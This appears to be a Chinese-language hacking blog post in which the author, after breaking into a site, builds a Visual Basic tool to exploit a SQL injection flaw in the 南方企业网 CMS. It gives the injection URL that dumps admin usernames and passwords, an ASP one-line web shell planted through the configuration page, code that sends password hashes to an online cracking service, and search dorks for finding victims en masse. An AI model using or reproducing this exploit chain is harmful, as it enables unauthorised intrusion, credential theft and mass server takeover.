VB编写南方企业网漏洞利用程序

刚入侵一个站，发现这个站用的是南方企业数据网的程序，于是就找了一下漏洞信息，
网上的漏洞信息如下注入漏洞

**************************
By：XoL-!
http://www.tsbct.com
************************** 发现日期:
2008-09-25
影响版本: v10.0 v11.0
Exploit:
http://www.southidc.net/0791idc11Q/NewsType.asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20=
获取shell方法:
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入"%><%eval(request(chr(35)))%><%
成功把shell写入http://www.target.com/inc/config.asp

感觉该写个漏洞利用程序，那样以后用起来也方便，用VB吧，简单实用
界面简单设置如下

代码如下：

声明函数
Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, i, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, i + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function
MD5破解
Private Sub Label2_Click()
Dim TT
Dim xmlHTTP1
Set xmlHTTP1 = CreateObject("Microsoft.XMLHTTP")    创建XMLHTTP对象
xmlHTTP1.open "GET", "aspx?q">http://www.cmd5.com/getmd5api.aspx?q=" & Text1.Text, False        GET方法提交请求
xmlHTTP1.setRequestHeader "Accept", "*/*"
xmlHTTP1.setRequestHeader "User-Agent", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB5; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; InfoPath.2; InfoPath.1; .NET CLR 2.0.50727)"
xmlHTTP1.setRequestHeader "Accept-Encoding", "gzip,deflate"
xmlHTTP1.setRequestHeader "Host", "www.cmd5.com"
xmlHTTP1.setRequestHeader "Connection", "Keep-Alive"
xmlHTTP1.setRequestHeader "Cache-Control", "no-cache"
xmlHTTP1.send
TT = bytes2BSTR(xmlHTTP1.responseBody)
TT = Replace(TT, "<br>", "")
Text2.Text = TT
End Sub
暴密码
Private Sub Label3_Click()
Dim url1 As String
Dim url2 As String
Dim url3 As String
url1 = "/NewsType.asp?SmallClass=%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20="
url2 = Text3.Text
url3 = url2 & url1
WebBrowser1.Navigate url3
End Sub

测试如下：

有了工具我们就可以批量入侵了

搜索

inurl:HrDemand.asp
inurl:comphonor.asp

补充：软件开发 , Vb ,

上一个：vbs创建注册表项
下一个：CMD下执行VBS下载脚本